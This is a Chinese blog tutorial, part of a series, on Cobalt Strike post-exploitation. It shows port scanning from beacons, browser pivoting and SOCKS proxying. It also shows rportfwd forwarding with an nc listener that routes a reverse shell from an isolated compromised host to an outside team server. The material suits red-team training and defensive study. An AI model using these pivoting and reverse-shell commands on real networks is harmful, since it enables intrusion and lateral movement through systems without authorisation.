Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

admin 2024年1月29日22:39:46评论13 views字数 1724阅读5分44秒阅读模式

一、端口扫描

0x01 进行扫描

(1):右键beacon-->Explore-->Port Scan

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):使用图形化界面进行端口扫描

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(3):使用命令进行端口扫描

portscan IP段 445 arp 数据包大小

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

0x02 查看扫描结果

(1):查看beacon命令行

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):查看目标视图

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

二、浏览器代理设置

0x01 设置浏览器代理

(1):右键beacon-->Explore-->Browser Pivot

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):配置代理端口

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(3):配置成功

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

三、内置SOCKS模块

0x01 设置SOCKS

  • 方法一:

(1):右键beacon-->Privoting-->SOCKS Server

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):设置端口

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(3):设置成功

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

如上图所示,这样就创建好了一个SOCKS代理。

  • 方法二

socks port

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

这样就启动了一个SOCKS代理。

0x02 查看SOCKS代理

(1):View-->Proxy Pivots

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):SOCKS代理如下

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

0x03 停止SOCKS代理

(1):停止所有SOCKS代理

socks stop

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

在对应的beacon中执行如上命令,可以停止该beacon中的所有代理。

(2):停止单个SOCKS代理

View-->Proxy Pivots

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

0x04 SOCKS代理使用

(1):第一种方法

直接使用浏览器添加一个SOCKS4代理(服务器选择Cobalt Strike团队服务器地址,端口就是上面指定的端口)。

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(2):第二种方法

选择一个SOCKS代理,点击Tuunel,将生成的代码复制到Meatasploit控制台中。

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

(3):第三种方法

使用各种代理工具。在windows中使用SocksCap64等工具,在Linux中使用Proxychains、sSocks等工具。

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

四、rportfwd模块

0x01 环境介绍

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

         上述三台主机A、B和C,其中A主机是外网主机并且上面搭建了Cobalt Strike的团队服务器,B主机已经被控制并且和团队服务器互通,C主机也被控制但是不通外网,和团队服务器不通。因此可以在B主机上使用rportfwd来进行端口转发。

0x02 端口转发

rportfwd [bind port] [forwad host] [forward port]rportfwd stop [bind port]

如果正向连接指定端口,可以使用端口转发来将被控制主机的本地端口转发到公网上,或者转发到团队服务器监听的端口上。在Cobalt Strike上选择一个beacon进入交互式,其中bind port为本机需要转发的本地端口,forward host为VPS或者团队服务器的IP,forward prot为VPS或团队服务器监听的端口。对应上图中,bind port就是主机B的端口,forward host就是1.1.1.1这个IP,forward port是1.1.1.1这个IP监听的端口。

0x03 端口转发实例

(1):在主机A上进行监听

如果主机A是团队服务器,则可以在团队服务器上监听一个端口,如4444端口;如果主机A是VPS,可以使用nc-lvp 4444来监听4444这个端口。

(2):进行端口转发

打开CobaltStrike中的beacon列表,选择192.168.223.1这个beacon,在里面执行如下命令:

rportfwd 1234 1.1.1.1 4444这个1234端口就是等会生成的反弹shell的监听端口。

(3):生成反弹shell

注意:这块需要生成一个反弹shell,这个反弹shell需要在主机C上执行,反弹shell中的监听IP是主机B的IP(192.168.223.1),监听端口是1234。

        整个流程是这样的,在主机C上执行反弹shell,反弹shell的IP是主机B的1234端口,因此将流量反弹到主机B的1234端口,由于rportfwd将主机B的1234端口的流量转发到了主机A的4444端口,因此流量被转发到主机A的4444端口,由于之前在cobalt Strike上监听了主机A的4444端口,因此在Cobalt Strike上得到了主机C的beacon。

Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理

原文始发于微信公众号(想走安全的小白):Cobalt Strike系列五----Cobalt Strike端口扫描和浏览器代理

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年1月29日22:39:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Cobalt Strike系列五Cobalt Strike端口扫描和浏览器代理https://cn-sec.com/archives/886389.html

发表评论

匿名网友 填写信息